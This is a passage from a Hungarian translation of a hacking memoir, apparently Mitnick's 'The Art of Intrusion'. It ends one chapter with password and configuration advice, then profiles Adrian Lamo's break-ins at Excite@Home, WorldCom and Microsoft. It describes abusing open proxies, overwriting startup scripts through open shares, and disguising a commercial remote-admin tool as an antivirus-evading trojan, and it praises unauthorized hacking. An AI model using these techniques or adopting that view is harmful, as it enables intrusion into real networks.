alapon működő közösségtől szerzik ismereteiket. Sokan még alig
végzik el a középiskola első két évét, de máris elég időt fordítottak arra
és elég tudást szereztek ezen a területen ahhoz, hogy hackelésből PhD
diplomát szerezzenek. Ha az MIT vagy a Cal Tech ilyen diplomát adna,
jó néhány olyat meg tudnék nevezni, aki beülhetne a záróvizsgára.
Nem csoda, hogy a biztonsági tanácsadók tekintélyes részének
rosszindulatú hackertevékenység árnyékolja be a múltját (köztük
olyanokét is, akiknek a történetei szerepelnek ebben a könyvben). A
biztonsági rendszerek feltörése olyan különleges típusú beállítottságot
igényel, amely lehetővé teszi, hogy valaki precíz elemzéssel állapítsa
meg, hogyan lehet a rendszert hibára kényszeríteni. Ha valaki csupán
iskolai képzéssel a háta mögött próbál belépni erre a területre, rengeteg
tapasztalatra van szüksége, hiszen olyan tanácsadókkal kell felvennie a
versenyt, akik 8-10 éves korukban kezdték meg a tanulást.
Kellemetlen lehet beismerni, de az igazság az, hogy a biztonsági
területen dolgozó szakemberek rengeteget tanulhatnak a hackerektől,
akik képesek a rendszerek gyengeségeit feltárni. A folyamat során
előfordulhat, hogy megsértik a törtvényt, azonban értékes szolgálatot
végeznek. Tény, hogy sok biztonsági „szakember” korábban hacker
volt.
Lehet, hogy lesznek, akik ezt olvasva az mondják, hogy Kevin
Mitnick, az egykori hacker egyszerűen a hackerek mai generációját
védi. Ezzel szemben az az igazság, hogy sok hackertámadás jó célt
szolgál azáltal, hogy feltárja egy cég biztonsági gyengéit. Ha a hacker
nem okoz kárt, nem követ el lopást és nem indít denial-of-service
(szolgáltatásleállítási) támadást, akkor a cég rosszul járt a támadással,
vagy éppen profitált abból, hogy szembesítették a saját
sebezhetőségével?

ÓVINTÉZKEDÉSEK

A megfelelő konfigurációkezelés olyan kulcsfontosságú feladat,


amelyet nem szabad mellőzni. Még ha a telepítés idején helyesen be is
állítjuk az összes hardvert és szoftvert, majd a biztonsági javítások
telepítésével napra készen tartjuk őket, egyetlen elem helytelen
konfigurálásával is létrehozhatjuk a téglát a falban. Minden
szervezetnek jól meghatározott eljárása kellene hogy legyen, amely
biztosítja, hogy az új hardvert és szoftvert telepítő informatikai
személyzet, illetve a telefonszolgáltatást telepítő szakemberek bizonyos
biztonsági intézkedéseket automatikusan végrehajtsanak.
Megkockáztatva a vádat, hogy korábbi könyvünket reklámozzuk,
szeretném itt is elmondani, hogy A megtévesztés művészete (Perfact-
Pro Kiadó, 2003) című könyvben részletes tervet közöltünk az
alkalmazottak számítógépes biztonsági tudatossággal kapcsolatos
képzéséről. A rendszereket és eszközöket üzembe helyezés előtt
biztonsági tesztnek kell alávetni.
Szilárd meggyőződésem, hogy a statikus jelszavak használata egy
idejétmúlt gyakorlat. Az értékes információt kezelő és tároló
rendszerek védelmére a biztonsági hitelesítés valamilyen fizikai
eszközt (pl. idő alapú jelet generáló vagy megbízható biometriai
berendezést) használó erősebb módszerét kellene alkalmazni –
robosztus személyes jelszavakkal együtt, amelyeket gyakran kell
változtatni. A hitelesítés erősebb formája nem garancia arra, hogy a
rendszert nem lehet meghackelni, de legalább magasabbra tesszük a
lécet.
A továbbra is kizárólag statikus jelszavakat használó szervezetnek
folyamatosan képezni kell az alkalmazottakat, illetve gyakori
emlékeztetőkkel és ösztönzőkkel kell bátorítani a biztonságos
jelszóhasználati gyakorlatot. A hatékony jelszóhasználati irányelvek
olyan jelszavakat követelnek meg a felhasználóktól, amelyek legalább
egy számot, egy jelet vagy kis– és nagybetűket egyaránt tartalmaznak,
és rendszeresen változtatják őket.
A következő lépés megköveteli az alkalmazottaktól, hogy – gyakran
a rossz memóriájukra hivatkozva – ne írják le a jelszavukat, és ne
ragasszák a monitorra, vagy ne rejtsék a billentyűzet alá, vagy a fiókba
– ezek azok a helyek, amelyeket egy tapasztalt adattolvaj elsőként
megnéz. A jó jelszóhasználati gyakorlat azt is megköveteli, hogy soha
ne használjuk ugyanazt a jelszót egynél több rendszeren.

ZÁRÓJELBEN

Ébredjünk fel, emberek! Az alapértelmezett beállítások


megváltoztatása és az erős jelszavak használata megakadályozhatja,
hogy vállalkozásunk áldozattá váljon.
Ez azonban nem csak a felhasználók butasága. A szoftvergyártók
azok, akik a biztonságot nem kezelték a rendszerek közötti
átjárhatósághoz és funkcionalitáshoz hasonló fontossággal. Tény, hogy
gondos útmutatást írtak a felhasználói és telepítési kézikönyvekbe. Van
egy mérnökök között terjedő régi mondás: „Ha sehogy másként nem
megy, olvasd el a használati utasítást.” Nyilvánvalóan nincs szükség
mérnöki diplomára e rossz szabály gyakorlására.
Ideje lenne, hogy a gyártók felismerjék ezt az állandó problémát.
Miért nem látják be a hardver– és szoftvergyártók, hogy a legtöbb
ember nem olvassa el a dokumentációt? Miért nem lehet egy a termék
telepítésekor felbukkanó üzenetet készíteni, amely a biztonsági
beállítások aktiválására vagy az alapértelmezett biztonsági beállítások
megváltoztatására figyelmeztet? Ami ennél is jobb lenne, ha a
biztonsági beállítások alapértelmezésben be lennének kapcsolva. A
Microsoft pontosan ezt tette nemrégiben, amikor kiadta a Windows XP
Professional és Home operációs rendszerekhez tartozó „Service Pack2”
biztonsági frissítést, amelyben a tűzfal alapértelmezésben be van
kapcsolva. Ez 2004 végén történt; ugyan mi tartott ilyen sokáig?
A Microsoftnak, illetve a többi operációs rendszer gyártó vállalatnak
már évekkel ezelőtt gondolnia kellett volna erre. Egy ilyen egyszerű
változtatás mindannyiunk számára biztonságosabbá teheti a kiberteret.

JEGYZETEK:

1. A phreaking célja a telefonos hálózat feltörésével mások


költségére vagy az ingyenes vonalakat kihasználva ingyen telefonálni.

5. fejezet

A Robin Hood hacker


[A hackelés] nekem soha sem a technológiáról szólt, számomra
sokkal inkább egy vallás.
Adrian Lamo
A hackelés szakértelmet igényel. Önképzéssel bárki megszerezheti
ezt a tudást. Nézetem szerint a hackelés kreatív művészet – annak
kiderítése, hogy kerülhetjük meg a biztonságot okosan, hasonlóan
ahhoz, hogy a zárfeltörő „őrültek” pusztán a szórakozás kedvéért
megpróbálják kiiktatni a zármechanizmusokat. Érdekes módon
hackelni akár a törvény megsértése nélkül is lehet.
A különbség abban rejlik, hogy a tulajdonos engedélyt adott-e a
hackernek arra, hogy megkíséreljen behatolni a számítógépes
rendszereibe. Sokfeleképpen lehet hackelni, akár az „áldozat”
engedélyével is. Sokan szánt szándékkal sértik meg a törvényt,
mégsem kapják el őket soha. Vannak, akik vállalják a kockázatot, és le
is töltik a börtönbüntetésüket. Mindegyikük egy virtuális név, a
becenév online változata mögé rejtik el a személyiségüket.
Aztán vannak olyanok is, mint Adrian Lamo, aki személyisége
elrejtése nélkül hackel, és amikor hibát talál valamely szervezet
biztonsági rendszerében, felhívja erre a figyelmüket. Ők a hackelés
Robin Hoodjai. Nem bebörtönözni, hanem ünnepelni kellene őket.
Segítenek a cégeknek felébredni, mielőtt egy rosszindulatú hacker
komoly károkat okozna nekik.
Azon szervezetek listája, amelyekről a szövetségi kormányzat azt
állítja, hogy Adrian Lamo betört hozzájuk, finoman szólva is
lenyűgöző. Többek között a Microsoftot, a Yahoo!-t, az MCI
WorldCom-ot, az Excite@Home-ot és az SBC, Ameritech és Cingular
telefontársaságokat tartalmazza[1]. És persze a nagyra becsült New
York Times-i.
Igen, igaz, Adrian költséget okozott ezeknek a cégeknek, de messze
nem olyan nagyot, mint ahogy az ügyészek állították.

Kiszabadulás

Adrian Lamo nem az a tipikus „lógjunk a plázában” típusú tinédzser


volt. Egyik késő este például barátaival egy a folyóparton levő nagy,
elhagyatott ipari komplexumot próbáltak felfedezni. Mivel semmilyen
különös tervük vagy céljuk nem volt, csak kóvályogtak a masszív,
lepusztult üzemben, és rövid idő alatt eltévedtek. Körülbelül hajnali
kettőre járt, mire sikerült kitalálniuk az útvesztőből. Ahogy a rozsdás
ipari gépek maradványai mellett levő, használaton kívüli vasúti síneket
keresztezték, Adrian gyenge síró hangot hallott. Noha a barátai semmi
másra nem vágytak, csak hogy végre kijussanak onnan, Adrianben
felébredt a kíváncsiság.
Az elhaló hangot követve egy koszos csatornához jutott. A halvány
fény éppen elegendő volt ahhoz, hogy meglássa a csatorna alján
csapdába esett, minden erejével nyávogó apró cicát. Adrian mobiljáról
felhívta a tudakozót a rendőrség számát kérte. Közvetlenül ezután egy
rendőrjárőr fénye vakította el a kis csoportot.
A fiúk Adrian elmondása szerint „városi terepruhában voltak –
tudod, kesztyűk és koszos felső ruhák. Nem az a fajta ruházat, amely
bizalmat és jóindulatot kelt a rendfenntartókban.” Adrian úgy véli,
hogy tinédzserként valahogy mindig gyanúsnak tűnt, és „előfordulhat,
hogy olyan dolgok voltak rajtunk, amelyek végül akár a
letartóztatásunkhoz is vezethettek volna”, mondja. A lehetőségek
végigfutottak a fejében; rengeteg kellemetlen kérdést tehetnek fel, és
lehet, hogy letartóztatják őket, elfuthatnak, vagy... és ekkor eszébe
jutott egy terv.
Leintettem őket és azt mondtam: – Itt van ez a cica a csatornában.
Biztosan tudnának nekünk segíteni. – Alig két órával később
egyikünktől sem akartak semmit kérdezni – a gyanús körülményeket
tökéletesen elfelejtették.
Két rendőrjárőrrel és egy állatvédővel később a sáros cicát sikerült
egy hosszú rúd végén levő hálóval biztonságba helyezni. A rendőrök
Adriannek adták a cicát, aki hazavitte, megmosta, és Alibinek nevezte
el. A barátai Dranónak hívták a macskát (az angol drain – csatorna
szóból).
Később Adrian eltöprengett ezen a találkozáson. Olyan valaki lévén,
aki nem hisz a véletlen egybeesésekben, biztos benne, hogy pontosan
ott voltak, ahol abban a pillanatban lenniük kellett. Hasonlóképpen
tekint a „szinte fantasztikus” számítógépes élményeire is: nincsenek
véletlenek.
Érdekes, hogy Adrién a cicás eset és a hackerek tettei között is lát
párhuzamot. Olyan szavak jutnak az eszébe, mint az „alkalmazkodás”,
az „improvizálás” és a „megérzés”, csupa olyan fogalom, amelyek
mindegyike elengedhetetlen a webes mellékutcákban és sikátorokban
leselkedő számtalan csapda és zsákutca sikeres elkerüléséhez.

Gyökerek

A bostoni születésű Adrian gyerekkorának nagy részét azzal töltötte,


hogy családjával ide-oda költöztek New Englandben, mígnem végül
Washington DC-ben telepedtek le. Apja, aki kolumbiai, gyerekmeséket
ír és spanyol-angol fordításokat csinál; Adrian született filozófusnak
tartja őt. Anyja angolt tanított, de most a háztartást vezeti. –
Kiskoromban politikai gyűlésekre hordtak. Úgy neveltek fel, hogy
kérdőjelezzem meg azt, amit magam körül látok, és próbáljam meg
tágítani a látókörömet.
Adrian nem érzi úgy, hogy bármelyik demográfiai profil
különösebben ráillene, noha ő is úgy gondolja, hogy a legtöbb hacker
az általa „fehér középosztály”-nak nevezett társadalmi csoportba
tanozik. Egyszer volt szerencsém találkozni a szüleivel, akik azt
mondták, hogy az egyik oka annak, hogy a fiúk belekeveredett a
hackelésbe, az, hogy több kedvenc hackere is volt, akik ösztönözték őt.
Nem volt erről szó, de az Adriannel folytatott beszélgetéseim során az
a benyomás alakult ki bennem, hogy ezen hackerek között lehetek. A
szülei valószínűleg szerették volna kitekerni a nyakam.
Hétéves korában Adrian elkezdett játszani az apja számítógépén, egy
Commodore 64-en. Egyik nap berágott a szöveges kalandjátékra,
amivel játszani próbált. Látszólag minden választás zsákutcába
vezetett. Rájött, hogy miközben betölti a számítógépre a programot,
még mielőtt kiadná a Run parancsot, lehetőség van arra, hogy a
számítógépet a játék forráskódjának kilistázására utasítsa. A lista
felfedte a keresett válaszokat, és így annak rendje és módja szerint
megnyerte a játékot.
Köztudott, hogy minél korábban kezd egy gyerek idegen nyelvet
tanulni, annál természetesebben fogja azt elsajátítani. Adrian úgy véli,
hogy ugyanez igaz a számítógéppel való korai megismerkedésre. Azt
gyanítja, hogy ennek az az oka, hogy az agy még nincs „behuzalozva”,
az idegháló sokkal rugalmasabb, gyorsabban tanul és fogad be, mint
felnőttkorban.
Adrian a számítógépek világában elmerülve nőtt fel, a valóság
kiterjesztését látta bennük, és így készen állt arra, hogy ügyesen
használja őket. Számára a számítógép nem olyasmi volt, amiről az
ember olvas vagy terjedelmes használati útmutatóból informálódik.
Nem külső eszköz volt, mint egy hűtőgép vagy egy autó, hanem ablak
– saját magába. Elhatározta, hogy rendszeresen úgy fogja az
információkat feldolgozni, ahogy a számítógép és annak belső
programjai teszik.

Éjszakai találkák

Az általa meghackelt céges számítógépes rendszerek közül Adrian


az Excite@Home-ot tartja a legkalandosabb történetnek. A sztori akkor
kezdődött, amikor valaki félig tréfálkozva azt javasolta, hogy
próbálkozzon meg az @Home oldallal. Mivel ez az Egyesült Államok
összes kábeles Internet szolgáltatásának az elszámolóháza, Adrian
biztos volt benne, hogy nagyon védve van, és feleslegesen pazarolja az
idejét. Ha azonban sikerülne betörnie, az ország összes
kábelfelhasználójának fontos adataihoz hozzáférne.
A hackerek napjainkban fedezték fel, hogy a Google meglepően
segítőkész tud lenni a szóba jöhető célpontok felfedésében, és a velük
kapcsolatos hasznos információk kiderítésében. Adrian gyakran kezdi
azzal hackeres behatolásait, hogy olyan kulcsszavakra keres rá,
amelyek igen nagy arányban vezethetnek hibásan konfigurált
oldalakhoz.
Így hát csatlakoztatta laptopját a philadelphiai egyetem aulájában
levő nyílt hálózathoz, és betöltötte az Excite@Home weboldalát. Az
egyetemi aula ismerős helyszín volt számára: minden olyan hely, amit
sokan használnak, egy nyilvános Internet kávézó vagy egy nyílt
vezeték nélküli hozzáférési pont, egyszerűen és hatékonyan segít
abban, hogy a hacker eltitkolja a tartózkodási helyét. Rendkívül nehéz
felfedni olyan valakinek az igazi személyazonosságát, aki
véletlenszerűen használ nyilvános Internet hozzáférési pontokat.
Adrian – a hálózati mérnökök által gyakran alkalmazott sémákat és
szabványos gyakorlatot használva kiindulópontként – rögeszmésen
próbál a támadni kívánt programot vagy hálózatot tervező ember
fejével gondolkozni. Meglehetős ügyességre tett szert a hibásan
beállított proxyszerverek kiaknázásában. (A proxyszerver olyan
speciális számítógépes rendszer, amely a belső hálózat és az olyan
„megbízhatatlan” hálózatok, mint az Internet közötti forgalmat kezeli.)
A proxy a neki megadott szabályok alapján vizsgál meg minden
csatlakozási kérést. Amikor egy hálózati rendszergazda elrontja a cég
proxyszervereinek a beállítását, bárki, aki csatlakozik a proxyhoz,
képes lehet bejutni a cég biztonságosnak vélt belső hálózatához.
A hacker számára egy ilyen nyitott proxy felkérés keringőre, hiszen
lehetővé teszi neki, hogy látszólag úgy indítson kéréseket, mintha a cég
egy arra jogosult alkalmazottja lenne: a cég saját hálózatán belülről.
Az egyetem aulájából Adrian felfedezett egy hibásan beállított
proxyt, amely ajtót nyitott neki az Excite@Home különböző
részlegeinek belső weboldalaihoz. Az egyik ilyen oldal Help részében
feltett egy kérdést a belépéssel kapcsolatos problémákról. A kapott
válaszban benne volt a rendszer egy az informatikai problémák
megoldására létrehozott kis részének az URL címe. Ezen URL
elemzésével Adrian hozzáférést szerzett a cég azon részlegeihez,
amelyek ugyanezt a technológiát használták. Nem kérték tőle, hogy
hitelesítse magát: a rendszer arra a feltevésre épült, hogy ha valaki
ismerte a weboldal e részeinek a címét, akkor alkalmazott, vagy más
arra jogosult személy kell hogy legyen – egy megbízhatatlan feltevés,
amely olyan elterjedt, hogy még neve is van: titkolózáson alapuló
biztonság (security through obscurity).
Következő lépésként egy kibertérkalandorok körében népszerű oldalt
keresett fel, a Netcraft.com-ot. Adrian véletlenszerűen bevitt néhány
részleges domainnevet, és a gép Netcraft az Excite@Home
szervereinek a listáját dobta ki, megmutatva azt is, hogy azok Apache
webszervert futtató Solaris gépek.
Adrian felfedezte, hogy a cég hálózati műveletekért felelős
központja olyan műszaki támogató rendszert kínált, amely lehetővé
tette, hogy az arra jogosult alkalmazottak hozzáférjenek a – „Segítség,
nem férek hozzá az accountom-hoz”, vagy hasonló problémák miatt –
segítséget kérő ügyfelek adataihoz. Az alkalmazott esetenként
megkérte az ügyfelet, hogy adja meg felhasználói nevét és jelszavát –
ez elég biztonságos, hiszen minden a céges tűzfal mögött történik; az
adatokat egy hibakezelő adatlapra vitték fel.
Adrian hihetetlen dologra bukkant. A kincsek között olyan
adatlapokat talált, amelyek az ügyfelek bejelentkezési és
jelszóinformációit, a hibakezelő adatlapok feldolgozási folyamatának
részleteit, illetve a belső felhasználók számítógépes problémáinak
leírásait tartalmazták. Ráadásul talált még egy „hitelesítő cookie”-t
generáló szkriptet, amely lehetővé tette, hogy a műszaki személyzet az
account tulajdonosa nevében, az ügyfél jelszavának megkérdezése
nélkül bejelentkezzen, és orvosolja a problémákat.
Az egyik adatlapon levő feljegyzés felkeltette Adrian figyelmét. Egy
olyan ügyfél esetéről volt szó, aki több mint egy évvel korábban kért
segítséget személyes adatainak, többek között hitelkártyaszámainak
egy Internet Relay Chat szolgáltatás használata során történő ellopása
miatt. A belső feljegyzés azt írta, hogy a technikusok úgy döntöttek,
hogy ez nem az ő problémájuk, és nem foglalkoznak a válaszolással.
Tulajdonképpen egyszerűen lerázták a szegény fickót. Adrian magát a
cég műszaki szakemberének kiadva felhívta a férfit az otthonában, és
azt mondta neki: – Igazából nem hozzám tartozik ez a hibakezelési
adatlap, csupán kíváncsi vagyok, hogy kapott-e tőlünk egyáltalán
bármilyen visszajelzést. – A férfi azt mondta, hogy egyetlenegyszer
sem keresték. Adrian azonnal megmondta neki a kérdésére a helyes
választ, illetve továbbította számára a fel nem dolgozott adatlapjával
kapcsolatos belső dokumentációt és feljegyzést.
Jólesőelégedettség töltött el, mert szeretnék hinni egy olyan
világban, ahol olyan valószínűtlen dolgok történhetnek, hogy egy évvel
azután, hogy az Internet Relay Chaten valaki ellopja az adataidat,
felhív egy betolakodó, aki azt a céget törte fel, akiben te bíztál és akitől
segítséget kértél, és ráadásul válaszol az egy évvel korábban feltett
kérdésedre.
Nagyjából ez idő tájt a számára hozzáférést biztosító nyitott proxy
leállt. Nem tudta, hogy miért, azonban többé már nem tudott bejutni.
Más utat keresett. A megközelítés, amellyel előállt, saját szavai szerint
„teljesen újszerű” volt.
Az első szalmaszálat, amibe belekapaszkodhatott, az úgynevezett
fordított DNS keresésből (reverse DNS lookup) kapta – ez nem más,
mint amikor egy IP-címet használnak arra, hogy megtudják az ahhoz
tartozó hostnevet. (Amennyiben beírjuk a böngészőnkbe a kérést, hogy
menjen a www.defensivethinking.com oldalra, a kérés a domain
névszerverbe (DNS) megy, amely olyan címre fordítja a nevet, amit az
Interneten a kérés továbbítására lehet használni; ez példánkban a
209.151.246.5. Az Adrian által használt taktika megfordította a
folyamatot: a támadó egy IP-címet ír be, és megkapja annak az
eszköznek a domainnevét, amelyhez a cím tartozik.)
Rengeteg címen kellett végigmennie, amelyek legtöbbje egyáltalán
nem volt érdekes a számára. Végül azonban talált egy
dialupOO.corp.home.net formátumú nevet, illetve néhány másikat,
amelyek szintén „dialup”-pal kezdődtek. Azt feltételezte, hogy ezeket a
hostokat a távol levő alkalmazottak használják arra, hogy
betárcsázzanak a céges hálózatba.
Hamarosan arra is rájött, hogy ezeket a betárcsázó számokat olyan
alkalmazottak használták, akik az operációs rendszer régebbi
változatait futtató számítógépeken dolgoztak – olyan ősrégi verziót
használtak, mint a Windows 98. És a betárcsázó felhasználók
némelyike nyílt megosztásokat (open share) használt, amelyek olvasási
vagy írási jelszó nélküli távoli hozzáférést engedélyeztek bizonyos
könyvárakhoz vagy akár egész merevlemezekhez. Adrian felismerte,
hogy meg tudja változtatni az operációs rendszer indító szkriptjét, ha
megfelelő fájlokat másol a megosztásokba, így azok a neki tetsző
parancsokat fogják futtatni. Miután felülírta az adott indító fájlokat a
saját maga által készített változattal, tudta, hogy várnia kell addig, amíg
a rendszer újra bebootol, és az ő parancsai hajtódnak végre. De Adrian
nagyon jól tudja, hogyan kell türelmesnek lenni.
A türelme végül rózsát termett, és Adrian a következő lépéssel
folytatta: egy Remote Access Trojant (egy RAT-et, vagyis távoli
hozzáférést biztosító trójai programot) telepített. Ehhez azonban nem a
széles körben elérhető, hackerek által fejlesztett trójaiak egyikét
használta, amit a többi behatoló választ rosszindulatú céljaihoz. A
napjainkban oly népszerű vírusirtó programokat úgy készítik el, hogy
felismerjék a gyakori hátsó ajtó és trójai programokat, és azonnal
karanténba helyezzék őket. Ennek kikerülésére Adrian egy hálózati
rendszergazdák számára kifejlesztett legális eszközt használt – egy
kereskedelmi forgalomban kapható távoli felügyeletet biztosító
szoftrvert –, amely miután kissé módosítja, láthatatlan a felhasználó
számára.
Miközben a vírusirtó termékek a hacker alvilág által használni vélt
távoli hozzáférést biztosító szoftverek után kutatnak, nem figyelnek a
kereskedelmi szoftvertársaságok által kifejlesztett távoli hozzáférést
biztosító szoftverekre, hiszen azt feltételezik, hogy ezeket a termékeket
szabályszerűen használják (és gondolom azért sem, mert az X
szoftvercég perelhetne, ha a vírusszűrő szoftver rosszindulatúként
kezelné és blokkolná a termékét). Én személy szerint azt gondolom,
hogy ez hibás felfogás: a vírusinó termékeknek minden olyan termékre
figyelmeztetnie kellene a felhasználót, amely rossz szándékkal
használható, és hagyni kellene, hogy a felhasználó döntse el, hogy azt
vajon jogszerűen telepítették-e. Ezt a kiskaput kihasználva Adriannek
gyakran sikerült „legitim”, a virusszűrő szoftverek figyelmét kikerülő
RAT programokat telepítenie.
Miután sikeresen telepítette az @Home alkalmazott számítógépére
az RAT programot, olyan parancsok sorozatát hajtotta végre, amelyek
információt nyújtottak neki a többi számítógépes rendszerhez való
aktív hálózati csatlakozásokról. Ezen parancsok egyike, a „netstat” egy
olyan alkalmazott hálózati tevékenységét mutatta meg neki, aki az
adott pillanatban betárcsázással csatlakozott az @Home intranet
hálózatához, és ebből kiderült, hogy az alkalmazott éppen milyen
számítógépes rendszereket használt a belső céges hálózaton.
Annak érdekében, hogy lássunk egy példát a netstat által megadott
adatokra, lefutattam a saját gépemen a programot, hogy megvizsgáljam
a működését; a kapott lista egy része így nézett ki:
C:and Settings>netstat –a
Active Connections
Proto Local Address Foreign Address
State
TCP lockpicker: 1411 64.12.26.50:519 0
ESTABLISHED
TCP lockpicker: 2842 catlow.cyberverse.com:22
ESTABLISHED
TCP lockpicker: 2982 www.kevinmitnick.com: http
ESTABLISHED
A „Local Address” (helyi cím) a helyi gép nevét (ekkoriban a
„lockpicker” nevet használtam a számítógépemre) és a port számát
mutatja. A „Foreign Address” (külső cím) a távoli számítógép
hostnevét vagy IP-címét, és azt a port számot mutatja, amelyhez a
csatakozás történt. Példánkban a jelentés első sora jelzi, hogy a
számítógépem csatlakozást létesített a 64.12.26.50-hez az 5190-es
számú ponon; ez az AOL Instant Messenger által rendszerint használt
port. A „State” (állapot) a kapcsolat állapotát mutatja: „Established”,
amennyiben a kapcsolat az adott pillanatban aktív. „Listening”
olyankor, amikor a helyi gép bejövő kapcsolatra vár.
A „catlow.cyberverse.com” bejegyzést tartalmazó következő sor
mutatja annak a számítógépes rendszernek a hostnevét, amelyhez
csatlakoztam. Az utolsó sorban található
„www.kevinmitnick.com;http” bejegyzés azt jelzi, hogy saját
személyes weboldalomhoz csatlakoztam aktívan.
A célszámítógép tulajdonosának nem feltétlenül kell a
szolgáltatásokat a jól ismert portokon futtatnia, úgy is beállíthatja a
számítógépet, hogy nem szokványos portokat használjon. A HTTP (a
webszerver) például általában a 80-as ponon fut, a tulajdonos azonban
ezt megváltoztathatja úgy hogy a webszervert az általa kiválasztott
bármely port futtassa. Az alkalmazottak TCP kapcsolatait kilistáztatva
Adrian megtudta, hogy az @Home alkalmazottak nem szokványos
portokon keresztül kapcsolódtak a webszerverekhez.
Egy ilyen információból Adrian képes volt olyan belső gépek IP-
címét megszerezni, amelyeken már érdemes bizalmas @Home céges
adatok után kutatni. A sok kincs között nevek, e-mail címek,
kábelmodemek sorozatszámainak, aktuális IP-címek adatbázisaira
bukkant rá, sőt még azt is megtudta, hogy a cég majdnem 3 millió
széles sávú előfizetője milyen operációs rendszert használ a
számítógépén.
Adrian szavai szerint ez olyan „egzotikus típusú támadás” volt,
mivel egy távol levő, a hálózatba betárcsázó alkalmazott kapcsolatának
eltérítésével indult.
Adrian szerint elég egyszerűen elérhető, hogy a kérését a rendszer
megbízható felhasználótól érkezőnek tartsa. Az igazán nehéz – ami egy
hónapnyi próbálkozásába került –, a hálózat részletes térképének az
összeállítása volt: miből állnak a különböző részek, és hogyan
kapcsolódnak egymáshoz.
Az Excite@Home vezető hálózati mérnökének Adrian korábban már
adott információkat, és úgy érezte, hogy megbízhat benne. Eltért a
szokásos módszerétől, amely szerint egy közvetítőt használva adta át az
információkat a megtámadott cégnek, és felhívta közvetlenül a
mérnököt, majd elmagyarázta hogy kritikus gyengeségeket fedezett fel
a cég hálózatában. A mérnök az Adrian által javasolt késői időpont
ellenére beleegyezett a találkozóba. Éjféltájt ültek le.
– Megmutattam neki az általam megszerzett dokumentáció egy
részét. Felhívta a biztonsági fickóját, és hajnali 4 óra 30 körül
találkoztunk vele az [Excite@Home] irodánál. – A két férfi végigment
Adrian anyagán, és részletesen kikérdezték a betörésről. Miután reggeli
hat fele befejezték, Adrian azt mondta, hogy látni szeretné azt a
proxyszervert, amelyet a hozzáférés megszerzéséhez használt.
Átnéztük a gépet. És ekkor azt kérdezték tőlem: – Hogyan tennéd
biztonságossá a gépet?
Adrian már tudta, hogy a szervert semmilyen kritikus feladatra nem
használták.
Elővettem a zsebkésemet, ami egy egyszerű kis kinyitható bicska volt.
Odamentem a géphez, elvágtam a kábelét, és azt mondtam: – Most már
biztonságos a gép.
Azt mondták: – Nem rossz. – A mérnök keresett egy cetlit, irt rá
valamit, és rátűzte a gépre. A cetlin ez állt: Ne csatlakoztasd vissza.
Adrian annak eredményeképpen szerzett hozzáférést egy nagy
céghez, hogy felfedezett egy valószínűleg már hosszú évek óta funkció
nélküli gépet, amire senki nem figyelt fel, illetve senki sem vette a
fáradságot, hogy eltávolítsa. – Minden cégnél – mondja Adrian – van
egy halom gép, amely egyszerűen ott áll, csatlakoztatva vannak, de
senki nem használja őket. – Minden egyes ilyen gép potenciális
lehetőséget kínál a betöréshez.

MCI WorldCom

Mint korábban olyan sok más rendszer esetében, ismét a


proxyszerverek támadása adta Adrian kezébe a WorldCom
királyságának a kulcsát. Kedvenc eszközével, egy ProxyHunter nevű, a
nyitott proxyszervereket felkutató programmal állt neki a keresésnek.
Az eszközt laptopjáról futtatva letapogatta a WorldCom céges Internet
címterét, és gyorsan sikerült öt nyitott proxyt azonosítania – ezek
egyike egy wcom.com URL végződésben rejtőzött. Innen már csak
annyit kellett tennie, hogy a böngészőjét valamelyik proxy használatára
állítja be, és olyan egyszerűen szörfölhetett a WorldCom
magánhálózatán, mint a cég bármely alkalmazottja.
Miután bejutott, további biztonsági rétegeket talált, hiszen jelszó
kellett a különböző intranetes weboldalakhoz való hozzáféréshez.
Biztos vagyok benne, hogy lesznek olyanok, akik meglepődnek azon,
hogy egy olyan hacker, mint Adrian, milyen türelmes tud lenni, és hány
órát hajlandó rászánni arra, hogy bejusson. Mindenesetre két hónappal
később Adrian végre sikerrel járt.
Hozzáférést szerzett a WorldCom Emberi Erőforrások rendszeréhez,
amely a cég 86 000 alkalmazottjának nevét és társadalombiztosítási
számát adta a kezébe. Ezen információk és a személy születési
dátumának ismeretében (Adrian az anybirthday.com oldalra esküszik)
képes volt átállítani az alkalmazott jelszavát, és hozzáférést szerzett a
bérszámfejtési rekordokhoz, olyan információkhoz jutva ezzel, mint az
adott alkalmazott fizetése és a vészhelyzet esetén értesítendő
személyek kontaktadatai. Akár a közvetlen banki átutalásokat is
módosíthatta volna, bármely alkalmazott fizetését a saját számlájára
irányítva ezzel. Nem esett kísértésbe, de tisztában volt vele, hogy
„sokan lennének hajlandóak egy kis huncutságra néhány százezer
dollárért.” A Microsofton belül beszélgetésünk idején Adrian az ítéletet
várta jó néhány számítógépes vád kapcsán; elmesélte egy olyan
incidens történetét, amely miatt – noha a szövetségi ügyész tisztában
voh az esettel – nem emeltek ellene vádat. Mivel nem kívánta bővíteni
az ügyész listáján levő vádakat, kénytelen volt nagyon óvatosnak lenni
a Microsofttal kapcsolatos történet elmesélésekor. A nyelvére kínosan
ügyelve mesélte:
Elmondhatom, hogy mit feltételeztek. Azt feltételezték, hogy volt egy
weboldal, amit én feltételezetten megtaláltam, ami feltételezetten nem
igényelt azonosítást, semmi nem jelezte, hogy [az információ]
magántulajdon, semmi nem volt rajta, csupán egy keresés menü.
Még a szoftvercégek királyánál sincsen mindig rendben a
számítógépes biztonság.
Miután bevitt egy nevet, Adrian, „tegyük fel” észrevette, hogy egy
vásárló online rendelésének adatait kapta vissza. Adrian elmondta,
hogy a kormányzat úgy írta le ezt az oldalt, mint amely vásárlási és
szállítási információkat tárolt mindazokról, akik valaha is online
rendeltek terméket a Microsoft weboldaláról, illetve bejegyzéseket
tartalmazott olyan megrendelésekről, amelyek esetében
visszautasították a hitelkártyákat. Igen zavaró lenne, ha az adatok
valaha is kikerülnének a cégen kívülre.
Adrian tájékoztatta a Microsoft biztonsági réséről a Washington Post
egy újságíróját, akiben megbízott. Szokása szerint azzal a feltétellel
adta át az információt, hogy semmi nem jelenhet meg ebből mindaddig,
amíg a hibát ki nem javítják. Az újságíró továbbította az információt a
Microsoftnak, ahol az informatikusok nem jelezték, hogy tudomást
szereztek a betörésről. – A Microsoft vádat akart emelni – mondja
Adrian. – Meglehetősen nagy kárról számoltak be – egy 100 000
dolláros számlát nyújtottak be. – Valaki a cégnél később átgondolhatta
a dolgot. Adriannek azt mondták, hogy a Microsoft „elvesztette a
számlát”. A betörés miatti vád bennmaradt az aktájában, azonban nem
kapcsoltak hozzá dollárban kifejezett kárt. (Az újság online
archívumából megítélve a Post szerkesztői nem tartották az esetet
hírértékűnek, annak ellenére sem, hogy a Microsoft volt a célpont, és
egyik újságírójuk is belekeveredett az ügybe. Nagyon
